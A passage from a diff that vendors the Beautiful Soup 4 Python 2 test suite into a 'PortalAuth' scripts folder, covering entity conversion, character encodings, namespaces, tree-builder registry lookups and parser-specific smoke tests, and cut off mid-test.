        self.assertSoupEquals('<p id="pi&#xf1;ata"></p>', expect)
        self.assertSoupEquals('<p id="pi&#Xf1;ata"></p>', expect)
        self.assertSoupEquals('<p id="pi&ntilde;ata"></p>', expect)

    def test_entities_in_text_converted_to_unicode(self):
        expect = u'<p>pi\N{LATIN SMALL LETTER N WITH TILDE}ata</p>'
        self.assertSoupEquals("<p>pi&#241;ata</p>", expect)
        self.assertSoupEquals("<p>pi&#xf1;ata</p>", expect)
        self.assertSoupEquals("<p>pi&#Xf1;ata</p>", expect)
        self.assertSoupEquals("<p>pi&ntilde;ata</p>", expect)

    def test_quot_entity_converted_to_quotation_mark(self):
        self.assertSoupEquals("<p>I said &quot;good day!&quot;</p>",
                              '<p>I said "good day!"</p>')

    def test_out_of_range_entity(self):
        expect = u"\N{REPLACEMENT CHARACTER}"
        self.assertSoupEquals("&#10000000000000;", expect)
        self.assertSoupEquals("&#x10000000000000;", expect)
        self.assertSoupEquals("&#1000000000;", expect)

    def test_multipart_strings(self):
        "Mostly to prevent a recurrence of a bug in the html5lib treebuilder."
        soup = self.soup("<html><h2>\nfoo</h2><p></p></html>")
        self.assertEqual("p", soup.h2.string.next_element.name)
        self.assertEqual("p", soup.p.name)
        self.assertConnectedness(soup)

    def test_head_tag_between_head_and_body(self):
        "Prevent recurrence of a bug in the html5lib treebuilder."
        content = """<html><head></head>
<link></link>
<body>foo</body>
</html>
"""
        soup = self.soup(content)
        self.assertNotEqual(None, soup.html.body)
        self.assertConnectedness(soup)

    def test_multiple_copies_of_a_tag(self):
        "Prevent recurrence of a bug in the html5lib treebuilder."
        content = """<!DOCTYPE html>
<html>
<body>
<article id="a" >
<div><a href="1"></div>
<footer>
<a href="2"></a>
</footer>
</article>
</body>
</html>
"""
        soup = self.soup(content)
        self.assertConnectedness(soup.article)

    def test_basic_namespaces(self):
        """Parsers don't need to *understand* namespaces, but at the
        very least they should not choke on namespaces or lose
        data."""

        markup = b'<html xmlns="http://www.w3.org/1999/xhtml" xmlns:mathml="http://www.w3.org/1998/Math/MathML" xmlns:svg="http://www.w3.org/2000/svg"><head></head><body><mathml:msqrt>4</mathml:msqrt><b svg:fill="red"></b></body></html>'
        soup = self.soup(markup)
        self.assertEqual(markup, soup.encode())
        html = soup.html
        self.assertEqual('http://www.w3.org/1999/xhtml', soup.html['xmlns'])
        self.assertEqual(
            'http://www.w3.org/1998/Math/MathML', soup.html['xmlns:mathml'])
        self.assertEqual(
            'http://www.w3.org/2000/svg', soup.html['xmlns:svg'])

    def test_multivalued_attribute_value_becomes_list(self):
        markup = b'<a class="foo bar">'
        soup = self.soup(markup)
        self.assertEqual(['foo', 'bar'], soup.a['class'])
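
        # Note (illustrative, not in the original source): HTML defines
        # "class" as a multi-valued attribute, so Beautiful Soup splits it
        # on whitespace into a list; single-valued attributes stay strings.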

    #
    # Generally speaking, tests below this point are more tests of
    # Beautiful Soup than tests of the tree builders. But parsers are
    # weird, so we run these tests separately for every tree builder
    # to detect any differences between them.
    #

    def test_can_parse_unicode_document(self):
        # A seemingly innocuous document... but it's in Unicode! And
        # it contains characters that can't be represented in the
        # encoding found in the declaration! The horror!
        markup = u'<html><head><meta encoding="euc-jp"></head><body>Sacr\N{LATIN SMALL LETTER E WITH ACUTE} bleu!</body>'
        soup = self.soup(markup)
        self.assertEqual(u'Sacr\xe9 bleu!', soup.body.string)

    def test_soupstrainer(self):
        """Parsers should be able to work with SoupStrainers."""
        strainer = SoupStrainer("b")
        soup = self.soup("A <b>bold</b> <meta/> <i>statement</i>",
                         parse_only=strainer)
        self.assertEqual(soup.decode(), "<b>bold</b>")

    def test_single_quote_attribute_values_become_double_quotes(self):
        self.assertSoupEquals("<foo attr='bar'></foo>",
                              '<foo attr="bar"></foo>')

    def test_attribute_values_with_nested_quotes_are_left_alone(self):
        text = """<foo attr='bar "brawls" happen'>a</foo>"""
        self.assertSoupEquals(text)

    def test_attribute_values_with_double_nested_quotes_get_quoted(self):
        text = """<foo attr='bar "brawls" happen'>a</foo>"""
        soup = self.soup(text)
        soup.foo['attr'] = 'Brawls happen at "Bob\'s Bar"'
        self.assertSoupEquals(
            soup.foo.decode(),
            """<foo attr="Brawls happen at &quot;Bob\'s Bar&quot;">a</foo>""")

    def test_ampersand_in_attribute_value_gets_escaped(self):
        self.assertSoupEquals('<this is="really messed up & stuff"></this>',
                              '<this is="really messed up &amp; stuff"></this>')

        self.assertSoupEquals(
            '<a href="http://example.org?a=1&b=2;3">foo</a>',
            '<a href="http://example.org?a=1&amp;b=2;3">foo</a>')

    def test_escaped_ampersand_in_attribute_value_is_left_alone(self):
        self.assertSoupEquals('<a href="http://example.org?a=1&amp;b=2;3"></a>')

    def test_entities_in_strings_converted_during_parsing(self):
        # Both XML and HTML entities are converted to Unicode characters
        # during parsing.
        text = "<p>&lt;&lt;sacr&eacute; bleu!&gt;&gt;</p>"
        expected = u"<p>&lt;&lt;sacr\N{LATIN SMALL LETTER E WITH ACUTE} bleu!&gt;&gt;</p>"
        self.assertSoupEquals(text, expected)

    def test_smart_quotes_converted_on_the_way_in(self):
        # Microsoft smart quotes are converted to Unicode characters during
        # parsing.
        quote = b"<p>\x91Foo\x92</p>"
        soup = self.soup(quote)
        self.assertEqual(
            soup.p.string,
            u"\N{LEFT SINGLE QUOTATION MARK}Foo\N{RIGHT SINGLE QUOTATION MARK}")

    def test_non_breaking_spaces_converted_on_the_way_in(self):
        soup = self.soup("<a>&nbsp;&nbsp;</a>")
        self.assertEqual(soup.a.string, u"\N{NO-BREAK SPACE}" * 2)

    def test_entities_converted_on_the_way_out(self):
        text = "<p>&lt;&lt;sacr&eacute; bleu!&gt;&gt;</p>"
        expected = u"<p>&lt;&lt;sacr\N{LATIN SMALL LETTER E WITH ACUTE} bleu!&gt;&gt;</p>".encode("utf-8")
        soup = self.soup(text)
        self.assertEqual(soup.p.encode("utf-8"), expected)

    def test_real_iso_latin_document(self):
        # Smoke test of interrelated functionality, using an
        # easy-to-understand document.

        # Here it is in Unicode. Note that it claims to be in ISO-Latin-1.
        unicode_html = u'<html><head><meta content="text/html; charset=ISO-Latin-1" http-equiv="Content-type"/></head><body><p>Sacr\N{LATIN SMALL LETTER E WITH ACUTE} bleu!</p></body></html>'

        # That's because we're going to encode it into ISO-Latin-1, and use
        # that to test.
        iso_latin_html = unicode_html.encode("iso-8859-1")

        # Parse the ISO-Latin-1 HTML.
        soup = self.soup(iso_latin_html)
        # Encode it to UTF-8.
        result = soup.encode("utf-8")

        # What do we expect the result to look like? Well, it would
        # look like unicode_html, except that the META tag would say
        # UTF-8 instead of ISO-Latin-1.
        expected = unicode_html.replace("ISO-Latin-1", "utf-8")

        # And, of course, it would be in UTF-8, not Unicode.
        expected = expected.encode("utf-8")

        # Ta-da!
        self.assertEqual(result, expected)

    def test_real_shift_jis_document(self):
        # Smoke test to make sure the parser can handle a document in
        # Shift-JIS encoding, without choking.
        shift_jis_html = (
            b'<html><head></head><body><pre>'
            b'\x82\xb1\x82\xea\x82\xcdShift-JIS\x82\xc5\x83R\x81[\x83f'
            b'\x83B\x83\x93\x83O\x82\xb3\x82\xea\x82\xbd\x93\xfa\x96{\x8c'
            b'\xea\x82\xcc\x83t\x83@\x83C\x83\x8b\x82\xc5\x82\xb7\x81B'
            b'</pre></body></html>')
        unicode_html = shift_jis_html.decode("shift-jis")
        soup = self.soup(unicode_html)

        # Make sure the parse tree is correctly encoded to various
        # encodings.
        self.assertEqual(soup.encode("utf-8"), unicode_html.encode("utf-8"))
        self.assertEqual(soup.encode("euc_jp"), unicode_html.encode("euc_jp"))

    def test_real_hebrew_document(self):
        # A real-world test to make sure we can convert ISO-8859-8 (a
        # Hebrew encoding) to UTF-8.
        hebrew_document = b'<html><head><title>Hebrew (ISO 8859-8) in Visual Directionality</title></head><body><h1>Hebrew (ISO 8859-8) in Visual Directionality</h1>\xed\xe5\xec\xf9</body></html>'
        soup = self.soup(
            hebrew_document, from_encoding="iso8859-8")
        self.assertEqual(soup.original_encoding, 'iso8859-8')
        self.assertEqual(
            soup.encode('utf-8'),
            hebrew_document.decode("iso8859-8").encode("utf-8"))

    def test_meta_tag_reflects_current_encoding(self):
        # Here's the <meta> tag saying that a document is
        # encoded in Shift-JIS.
        meta_tag = ('<meta content="text/html; charset=x-sjis" '
                    'http-equiv="Content-type"/>')

        # Here's a document incorporating that meta tag.
        shift_jis_html = (
            '<html><head>\n%s\n'
            '<meta http-equiv="Content-language" content="ja"/>'
            '</head><body>Shift-JIS markup goes here.') % meta_tag
        soup = self.soup(shift_jis_html)

        # Parse the document, and the charset is seemingly unaffected.
        parsed_meta = soup.find('meta', {'http-equiv': 'Content-type'})
        content = parsed_meta['content']
        self.assertEqual('text/html; charset=x-sjis', content)

        # But that value is actually a ContentMetaAttributeValue object.
        self.assertTrue(isinstance(content, ContentMetaAttributeValue))

        # And it will take on a value that reflects its current
        # encoding.
        self.assertEqual('text/html; charset=utf8', content.encode("utf8"))

        # For the rest of the story, see TestSubstitutions in
        # test_tree.py.

    def test_html5_style_meta_tag_reflects_current_encoding(self):
        # Here's the <meta> tag saying that a document is
        # encoded in Shift-JIS.
        meta_tag = ('<meta id="encoding" charset="x-sjis" />')

        # Here's a document incorporating that meta tag.
        shift_jis_html = (
            '<html><head>\n%s\n'
            '<meta http-equiv="Content-language" content="ja"/>'
            '</head><body>Shift-JIS markup goes here.') % meta_tag
        soup = self.soup(shift_jis_html)

        # Parse the document, and the charset is seemingly unaffected.
        parsed_meta = soup.find('meta', id="encoding")
        charset = parsed_meta['charset']
        self.assertEqual('x-sjis', charset)

        # But that value is actually a CharsetMetaAttributeValue object.
        self.assertTrue(isinstance(charset, CharsetMetaAttributeValue))

        # And it will take on a value that reflects its current
        # encoding.
        self.assertEqual('utf8', charset.encode("utf8"))

    def test_tag_with_no_attributes_can_have_attributes_added(self):
        data = self.soup("<a>text</a>")
        data.a['foo'] = 'bar'
        self.assertEqual('<a foo="bar">text</a>', data.a.decode())


class XMLTreeBuilderSmokeTest(object):

    def test_pickle_and_unpickle_identity(self):
        # Pickling a tree, then unpickling it, yields a tree identical
        # to the original.
        tree = self.soup("<a><b>foo</a>")
        dumped = pickle.dumps(tree, 2)
        loaded = pickle.loads(dumped)
        self.assertEqual(loaded.__class__, BeautifulSoup)
        self.assertEqual(loaded.decode(), tree.decode())

    def test_docstring_generated(self):
        soup = self.soup("<root/>")
        self.assertEqual(
            soup.encode(), b'<?xml version="1.0" encoding="utf-8"?>\n<root/>')

    def test_real_xhtml_document(self):
        """A real XHTML document should come out *exactly* the same as it went in."""
        markup = b"""<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>Hello.</title></head>
<body>Goodbye.</body>
</html>"""
        soup = self.soup(markup)
        self.assertEqual(
            soup.encode("utf-8"), markup)

    def test_formatter_processes_script_tag_for_xml_documents(self):
        doc = """
<script type="text/javascript">
</script>
"""
        soup = BeautifulSoup(doc, "lxml-xml")
        # lxml would have stripped this while parsing, but we can add
        # it later.
        soup.script.string = 'console.log("< < hey > > ");'
        encoded = soup.encode()
        self.assertTrue(b"&lt; &lt; hey &gt; &gt;" in encoded)

    def test_can_parse_unicode_document(self):
        markup = u'<?xml version="1.0" encoding="euc-jp"><root>Sacr\N{LATIN SMALL LETTER E WITH ACUTE} bleu!</root>'
        soup = self.soup(markup)
        self.assertEqual(u'Sacr\xe9 bleu!', soup.root.string)

    def test_popping_namespaced_tag(self):
        markup = '<rss xmlns:dc="foo"><dc:creator>b</dc:creator><dc:date>2012-07-02T20:33:42Z</dc:date><dc:rights>c</dc:rights><image>d</image></rss>'
        soup = self.soup(markup)
        self.assertEqual(
            unicode(soup.rss), markup)

    def test_docstring_includes_correct_encoding(self):
        soup = self.soup("<root/>")
        self.assertEqual(
            soup.encode("latin1"),
            b'<?xml version="1.0" encoding="latin1"?>\n<root/>')

    def test_large_xml_document(self):
        """A large XML document should come out the same as it went in."""
        markup = (b'<?xml version="1.0" encoding="utf-8"?>\n<root>'
                  + b'0' * (2**12)
                  + b'</root>')
        soup = self.soup(markup)
        self.assertEqual(soup.encode("utf-8"), markup)

    def test_tags_are_empty_element_if_and_only_if_they_are_empty(self):
        self.assertSoupEquals("<p>", "<p/>")
        self.assertSoupEquals("<p>foo</p>")

    def test_namespaces_are_preserved(self):
        markup = '<root xmlns:a="http://example.com/" xmlns:b="http://example.net/"><a:foo>This tag is in the a namespace</a:foo><b:foo>This tag is in the b namespace</b:foo></root>'
        soup = self.soup(markup)
        root = soup.root
        self.assertEqual("http://example.com/", root['xmlns:a'])
        self.assertEqual("http://example.net/", root['xmlns:b'])

    def test_closing_namespaced_tag(self):
        markup = '<p xmlns:dc="http://purl.org/dc/elements/1.1/"><dc:date>20010504</dc:date></p>'
        soup = self.soup(markup)
        self.assertEqual(unicode(soup.p), markup)

    def test_namespaced_attributes(self):
        markup = '<foo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><bar xsi:schemaLocation="http://www.example.com"/></foo>'
        soup = self.soup(markup)
        self.assertEqual(unicode(soup.foo), markup)

    def test_namespaced_attributes_xml_namespace(self):
        markup = '<foo xml:lang="fr">bar</foo>'
        soup = self.soup(markup)
        self.assertEqual(unicode(soup.foo), markup)


class HTML5TreeBuilderSmokeTest(HTMLTreeBuilderSmokeTest):
    """Smoke test for a tree builder that supports HTML5."""

    def test_real_xhtml_document(self):
        # Since XHTML is not HTML5, HTML5 parsers are not tested to handle
        # XHTML documents in any particular way.
        pass

    def test_html_tags_have_namespace(self):
        markup = "<a>"
        soup = self.soup(markup)
        self.assertEqual("http://www.w3.org/1999/xhtml", soup.a.namespace)

    def test_svg_tags_have_namespace(self):
        markup = '<svg><circle/></svg>'
        soup = self.soup(markup)
        namespace = "http://www.w3.org/2000/svg"
        self.assertEqual(namespace, soup.svg.namespace)
        self.assertEqual(namespace, soup.circle.namespace)

    def test_mathml_tags_have_namespace(self):
        markup = '<math><msqrt>5</msqrt></math>'
        soup = self.soup(markup)
        namespace = 'http://www.w3.org/1998/Math/MathML'
        self.assertEqual(namespace, soup.math.namespace)
        self.assertEqual(namespace, soup.msqrt.namespace)

    def test_xml_declaration_becomes_comment(self):
        markup = '<?xml version="1.0" encoding="utf-8"?><html></html>'
        soup = self.soup(markup)
        self.assertTrue(isinstance(soup.contents[0], Comment))
        self.assertEqual(soup.contents[0], '?xml version="1.0" encoding="utf-8"?')
        self.assertEqual("html", soup.contents[0].next_element.name)


def skipIf(condition, reason):
    def nothing(test, *args, **kwargs):
        return None

    def decorator(test_item):
        if condition:
            return nothing
        else:
            return test_item

    return decorator
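
# Usage note (illustrative): this decorator is applied elsewhere in these
# test modules, e.g.
#   @skipIf(not LXML_PRESENT,
#           "lxml seems not to be present, not testing its tree builder.")
# which replaces the decorated test (or class) with a no-op when the
# condition holds.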
1
PortalAuth/includes/scripts/libs/bs4/tests/__init__.py
Executable file
@@ -0,0 +1 @@
"The beautifulsoup tests."
147
PortalAuth/includes/scripts/libs/bs4/tests/test_builder_registry.py
Executable file
@@ -0,0 +1,147 @@
"""Tests of the builder registry."""

import unittest
import warnings

from bs4 import BeautifulSoup
from bs4.builder import (
    builder_registry as registry,
    HTMLParserTreeBuilder,
    TreeBuilderRegistry,
)

try:
    from bs4.builder import HTML5TreeBuilder
    HTML5LIB_PRESENT = True
except ImportError:
    HTML5LIB_PRESENT = False

try:
    from bs4.builder import (
        LXMLTreeBuilderForXML,
        LXMLTreeBuilder,
    )
    LXML_PRESENT = True
except ImportError:
    LXML_PRESENT = False


class BuiltInRegistryTest(unittest.TestCase):
    """Test the built-in registry with the default builders registered."""

    def test_combination(self):
        if LXML_PRESENT:
            self.assertEqual(registry.lookup('fast', 'html'),
                             LXMLTreeBuilder)

        if LXML_PRESENT:
            self.assertEqual(registry.lookup('permissive', 'xml'),
                             LXMLTreeBuilderForXML)
        self.assertEqual(registry.lookup('strict', 'html'),
                         HTMLParserTreeBuilder)
        if HTML5LIB_PRESENT:
            self.assertEqual(registry.lookup('html5lib', 'html'),
                             HTML5TreeBuilder)

    def test_lookup_by_markup_type(self):
        if LXML_PRESENT:
            self.assertEqual(registry.lookup('html'), LXMLTreeBuilder)
            self.assertEqual(registry.lookup('xml'), LXMLTreeBuilderForXML)
        else:
            self.assertEqual(registry.lookup('xml'), None)
            if HTML5LIB_PRESENT:
                self.assertEqual(registry.lookup('html'), HTML5TreeBuilder)
            else:
                self.assertEqual(registry.lookup('html'), HTMLParserTreeBuilder)

    def test_named_library(self):
        if LXML_PRESENT:
            self.assertEqual(registry.lookup('lxml', 'xml'),
                             LXMLTreeBuilderForXML)
            self.assertEqual(registry.lookup('lxml', 'html'),
                             LXMLTreeBuilder)
        if HTML5LIB_PRESENT:
            self.assertEqual(registry.lookup('html5lib'),
                             HTML5TreeBuilder)

        self.assertEqual(registry.lookup('html.parser'),
                         HTMLParserTreeBuilder)

    def test_beautifulsoup_constructor_does_lookup(self):

        with warnings.catch_warnings(record=True) as w:
            # This will create a warning about not explicitly
            # specifying a parser, but we'll ignore it.

            # You can pass in a string.
            BeautifulSoup("", features="html")
            # Or a list of strings.
            BeautifulSoup("", features=["html", "fast"])

        # You'll get an exception if BS can't find an appropriate
        # builder.
        self.assertRaises(ValueError, BeautifulSoup,
                          "", features="no-such-feature")


class RegistryTest(unittest.TestCase):
    """Test the TreeBuilderRegistry class in general."""

    def setUp(self):
        self.registry = TreeBuilderRegistry()

    def builder_for_features(self, *feature_list):
        cls = type('Builder_' + '_'.join(feature_list),
                   (object,), {'features' : feature_list})

        self.registry.register(cls)
        return cls
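
    # Note (illustrative, not in the original source): type() fabricates a
    # throwaway builder class whose only interesting trait is its `features`
    # list, which is all the registry consults during lookup().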

    def test_register_with_no_features(self):
        builder = self.builder_for_features()

        # Since the builder advertises no features, you can't find it
        # by looking up features.
        self.assertEqual(self.registry.lookup('foo'), None)

        # But you can find it by doing a lookup with no features, if
        # this happens to be the only registered builder.
        self.assertEqual(self.registry.lookup(), builder)

    def test_register_with_features_makes_lookup_succeed(self):
        builder = self.builder_for_features('foo', 'bar')
        self.assertEqual(self.registry.lookup('foo'), builder)
        self.assertEqual(self.registry.lookup('bar'), builder)

    def test_lookup_fails_when_no_builder_implements_feature(self):
        builder = self.builder_for_features('foo', 'bar')
        self.assertEqual(self.registry.lookup('baz'), None)

    def test_lookup_gets_most_recent_registration_when_no_feature_specified(self):
        builder1 = self.builder_for_features('foo')
        builder2 = self.builder_for_features('bar')
        self.assertEqual(self.registry.lookup(), builder2)

    def test_lookup_fails_when_no_tree_builders_registered(self):
        self.assertEqual(self.registry.lookup(), None)

    def test_lookup_gets_most_recent_builder_supporting_all_features(self):
        has_one = self.builder_for_features('foo')
        has_the_other = self.builder_for_features('bar')
        has_both_early = self.builder_for_features('foo', 'bar', 'baz')
        has_both_late = self.builder_for_features('foo', 'bar', 'quux')
        lacks_one = self.builder_for_features('bar')
        has_the_other = self.builder_for_features('foo')

        # There are two builders featuring 'foo' and 'bar', but
        # the one that also features 'quux' was registered later.
        self.assertEqual(self.registry.lookup('foo', 'bar'),
                         has_both_late)

        # There is only one builder featuring 'foo', 'bar', and 'baz'.
        self.assertEqual(self.registry.lookup('foo', 'bar', 'baz'),
                         has_both_early)

    def test_lookup_fails_when_cannot_reconcile_requested_features(self):
        builder1 = self.builder_for_features('foo', 'bar')
        builder2 = self.builder_for_features('foo', 'baz')
        self.assertEqual(self.registry.lookup('bar', 'baz'), None)
36
PortalAuth/includes/scripts/libs/bs4/tests/test_docs.py
Executable file
@@ -0,0 +1,36 @@
"Test harness for doctests."

# pylint: disable-msg=E0611,W0142

__metaclass__ = type
__all__ = [
    'additional_tests',
    ]

import atexit
import doctest
import os
#from pkg_resources import (
#    resource_filename, resource_exists, resource_listdir, cleanup_resources)
import unittest

DOCTEST_FLAGS = (
    doctest.ELLIPSIS |
    doctest.NORMALIZE_WHITESPACE |
    doctest.REPORT_NDIFF)


# def additional_tests():
#     "Run the doc tests (README.txt and docs/*, if any exist)"
#     doctest_files = [
#         os.path.abspath(resource_filename('bs4', 'README.txt'))]
#     if resource_exists('bs4', 'docs'):
#         for name in resource_listdir('bs4', 'docs'):
#             if name.endswith('.txt'):
#                 doctest_files.append(
#                     os.path.abspath(
#                         resource_filename('bs4', 'docs/%s' % name)))
#     kwargs = dict(module_relative=False, optionflags=DOCTEST_FLAGS)
#     atexit.register(cleanup_resources)
#     return unittest.TestSuite((
#         doctest.DocFileSuite(*doctest_files, **kwargs)))
91
PortalAuth/includes/scripts/libs/bs4/tests/test_html5lib.py
Executable file
@@ -0,0 +1,91 @@
"""Tests to ensure that the html5lib tree builder generates good trees."""

import warnings

try:
    from bs4.builder import HTML5TreeBuilder
    HTML5LIB_PRESENT = True
except ImportError, e:
    HTML5LIB_PRESENT = False
from bs4.element import SoupStrainer
from bs4.testing import (
    HTML5TreeBuilderSmokeTest,
    SoupTest,
    skipIf,
)

@skipIf(
    not HTML5LIB_PRESENT,
    "html5lib seems not to be present, not testing its tree builder.")
class HTML5LibBuilderSmokeTest(SoupTest, HTML5TreeBuilderSmokeTest):
    """See ``HTML5TreeBuilderSmokeTest``."""

    @property
    def default_builder(self):
        return HTML5TreeBuilder()

    def test_soupstrainer(self):
        # The html5lib tree builder does not support SoupStrainers.
        strainer = SoupStrainer("b")
        markup = "<p>A <b>bold</b> statement.</p>"
        with warnings.catch_warnings(record=True) as w:
            soup = self.soup(markup, parse_only=strainer)
        self.assertEqual(
            soup.decode(), self.document_for(markup))

        self.assertTrue(
            "the html5lib tree builder doesn't support parse_only" in
            str(w[0].message))

    def test_correctly_nested_tables(self):
        """html5lib inserts <tbody> tags where other parsers don't."""
        markup = ('<table id="1">'
                  '<tr>'
                  "<td>Here's another table:"
                  '<table id="2">'
                  '<tr><td>foo</td></tr>'
                  '</table></td>')

        self.assertSoupEquals(
            markup,
            '<table id="1"><tbody><tr><td>Here\'s another table:'
            '<table id="2"><tbody><tr><td>foo</td></tr></tbody></table>'
            '</td></tr></tbody></table>')

        self.assertSoupEquals(
            "<table><thead><tr><td>Foo</td></tr></thead>"
            "<tbody><tr><td>Bar</td></tr></tbody>"
            "<tfoot><tr><td>Baz</td></tr></tfoot></table>")

    def test_xml_declaration_followed_by_doctype(self):
        markup = '''<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html>
<html>
<head>
</head>
<body>
<p>foo</p>
</body>
</html>'''
        soup = self.soup(markup)
        # Verify that we can reach the <p> tag; this means the tree is connected.
        self.assertEqual(b"<p>foo</p>", soup.p.encode())

    def test_reparented_markup(self):
        markup = '<p><em>foo</p>\n<p>bar<a></a></em></p>'
        soup = self.soup(markup)
        self.assertEqual(u"<body><p><em>foo</em></p><em>\n</em><p><em>bar<a></a></em></p></body>", soup.body.decode())
        self.assertEqual(2, len(soup.find_all('p')))

    def test_reparented_markup_ends_with_whitespace(self):
        markup = '<p><em>foo</p>\n<p>bar<a></a></em></p>\n'
        soup = self.soup(markup)
        self.assertEqual(u"<body><p><em>foo</em></p><em>\n</em><p><em>bar<a></a></em></p>\n</body>", soup.body.decode())
        self.assertEqual(2, len(soup.find_all('p')))

    def test_processing_instruction(self):
        """Processing instructions become comments."""
        markup = b"""<?PITarget PIContent?>"""
        soup = self.soup(markup)
        assert str(soup).startswith("<!--?PITarget PIContent?-->")
32
PortalAuth/includes/scripts/libs/bs4/tests/test_htmlparser.py
Executable file
@@ -0,0 +1,32 @@
"""Tests to ensure that the html.parser tree builder generates good
trees."""

from pdb import set_trace
import pickle
from bs4.testing import SoupTest, HTMLTreeBuilderSmokeTest
from bs4.builder import HTMLParserTreeBuilder

class HTMLParserTreeBuilderSmokeTest(SoupTest, HTMLTreeBuilderSmokeTest):

    @property
    def default_builder(self):
        return HTMLParserTreeBuilder()

    def test_namespaced_system_doctype(self):
        # html.parser can't handle namespaced doctypes, so skip this one.
        pass

    def test_namespaced_public_doctype(self):
        # html.parser can't handle namespaced doctypes, so skip this one.
        pass

    def test_builder_is_pickled(self):
        """Unlike most tree builders, HTMLParserTreeBuilder is pickled
        along with the tree and will be restored after unpickling.
        """
        tree = self.soup("<a><b>foo</a>")
        dumped = pickle.dumps(tree, 2)
        loaded = pickle.loads(dumped)
        self.assertTrue(isinstance(loaded.builder, type(tree.builder)))
76
PortalAuth/includes/scripts/libs/bs4/tests/test_lxml.py
Executable file
@@ -0,0 +1,76 @@
"""Tests to ensure that the lxml tree builder generates good trees."""

import re
import warnings

try:
    import lxml.etree
    LXML_PRESENT = True
    LXML_VERSION = lxml.etree.LXML_VERSION
except ImportError, e:
    LXML_PRESENT = False
    LXML_VERSION = (0,)

if LXML_PRESENT:
    from bs4.builder import LXMLTreeBuilder, LXMLTreeBuilderForXML

from bs4 import (
    BeautifulSoup,
    BeautifulStoneSoup,
)
from bs4.element import Comment, Doctype, SoupStrainer
from bs4.testing import skipIf
from bs4.tests import test_htmlparser
from bs4.testing import (
    HTMLTreeBuilderSmokeTest,
    XMLTreeBuilderSmokeTest,
    SoupTest,
    skipIf,
)

@skipIf(
    not LXML_PRESENT,
    "lxml seems not to be present, not testing its tree builder.")
class LXMLTreeBuilderSmokeTest(SoupTest, HTMLTreeBuilderSmokeTest):
    """See ``HTMLTreeBuilderSmokeTest``."""

    @property
    def default_builder(self):
        return LXMLTreeBuilder()

    def test_out_of_range_entity(self):
        self.assertSoupEquals(
            "<p>foo&#10000000000000;bar</p>", "<p>foobar</p>")
        self.assertSoupEquals(
            "<p>foo&#x10000000000000;bar</p>", "<p>foobar</p>")
        self.assertSoupEquals(
            "<p>foo&#1000000000;bar</p>", "<p>foobar</p>")

    # In lxml < 2.3.5, an empty doctype causes a segfault. Skip this
    # test if an old version of lxml is installed.

    @skipIf(
        not LXML_PRESENT or LXML_VERSION < (2,3,5,0),
        "Skipping doctype test for old version of lxml to avoid segfault.")
    def test_empty_doctype(self):
        soup = self.soup("<!DOCTYPE>")
        doctype = soup.contents[0]
        self.assertEqual("", doctype.strip())

    def test_beautifulstonesoup_is_xml_parser(self):
        # Make sure that the deprecated BSS class uses an xml builder
        # if one is installed.
        with warnings.catch_warnings(record=True) as w:
            soup = BeautifulStoneSoup("<b />")
        self.assertEqual(u"<b/>", unicode(soup.b))
        self.assertTrue("BeautifulStoneSoup class is deprecated" in str(w[0].message))

@skipIf(
    not LXML_PRESENT,
    "lxml seems not to be present, not testing its XML tree builder.")
class LXMLXMLTreeBuilderSmokeTest(SoupTest, XMLTreeBuilderSmokeTest):
    """See ``HTMLTreeBuilderSmokeTest``."""

    @property
    def default_builder(self):
        return LXMLTreeBuilderForXML()
482
PortalAuth/includes/scripts/libs/bs4/tests/test_soup.py
Executable file
@@ -0,0 +1,482 @@
# -*- coding: utf-8 -*-
"""Tests of Beautiful Soup as a whole."""

from pdb import set_trace
import logging
import unittest
import sys
import tempfile

from bs4 import (
    BeautifulSoup,
    BeautifulStoneSoup,
)
from bs4.element import (
    CharsetMetaAttributeValue,
    ContentMetaAttributeValue,
    SoupStrainer,
    NamespacedAttribute,
    )
import bs4.dammit
from bs4.dammit import (
    EntitySubstitution,
    UnicodeDammit,
    EncodingDetector,
)
from bs4.testing import (
    SoupTest,
    skipIf,
)
import warnings

try:
    from bs4.builder import LXMLTreeBuilder, LXMLTreeBuilderForXML
    LXML_PRESENT = True
except ImportError, e:
    LXML_PRESENT = False

PYTHON_2_PRE_2_7 = (sys.version_info < (2,7))
PYTHON_3_PRE_3_2 = (sys.version_info[0] == 3 and sys.version_info < (3,2))

class TestConstructor(SoupTest):

    def test_short_unicode_input(self):
        data = u"<h1>éé</h1>"
        soup = self.soup(data)
        self.assertEqual(u"éé", soup.h1.string)

    def test_embedded_null(self):
        data = u"<h1>foo\0bar</h1>"
        soup = self.soup(data)
        self.assertEqual(u"foo\0bar", soup.h1.string)

    def test_exclude_encodings(self):
        utf8_data = u"Räksmörgås".encode("utf-8")
        soup = self.soup(utf8_data, exclude_encodings=["utf-8"])
        self.assertEqual("windows-1252", soup.original_encoding)


class TestWarnings(SoupTest):

    def _no_parser_specified(self, s, is_there=True):
        v = s.startswith(BeautifulSoup.NO_PARSER_SPECIFIED_WARNING[:80])
        self.assertTrue(v)

    def test_warning_if_no_parser_specified(self):
        with warnings.catch_warnings(record=True) as w:
            soup = self.soup("<a><b></b></a>")
        msg = str(w[0].message)
        self._no_parser_specified(msg)

    def test_warning_if_parser_specified_too_vague(self):
        with warnings.catch_warnings(record=True) as w:
            soup = self.soup("<a><b></b></a>", "html")
        msg = str(w[0].message)
        self._no_parser_specified(msg)

    def test_no_warning_if_explicit_parser_specified(self):
        with warnings.catch_warnings(record=True) as w:
            soup = self.soup("<a><b></b></a>", "html.parser")
        self.assertEquals([], w)

    def test_parseOnlyThese_renamed_to_parse_only(self):
        with warnings.catch_warnings(record=True) as w:
            soup = self.soup("<a><b></b></a>", parseOnlyThese=SoupStrainer("b"))
        msg = str(w[0].message)
        self.assertTrue("parseOnlyThese" in msg)
        self.assertTrue("parse_only" in msg)
        self.assertEqual(b"<b></b>", soup.encode())

    def test_fromEncoding_renamed_to_from_encoding(self):
        with warnings.catch_warnings(record=True) as w:
            utf8 = b"\xc3\xa9"
            soup = self.soup(utf8, fromEncoding="utf8")
        msg = str(w[0].message)
        self.assertTrue("fromEncoding" in msg)
        self.assertTrue("from_encoding" in msg)
        self.assertEqual("utf8", soup.original_encoding)

    def test_unrecognized_keyword_argument(self):
        self.assertRaises(
            TypeError, self.soup, "<a>", no_such_argument=True)
    def test_disk_file_warning(self):
        filehandle = tempfile.NamedTemporaryFile()
        filename = filehandle.name
        try:
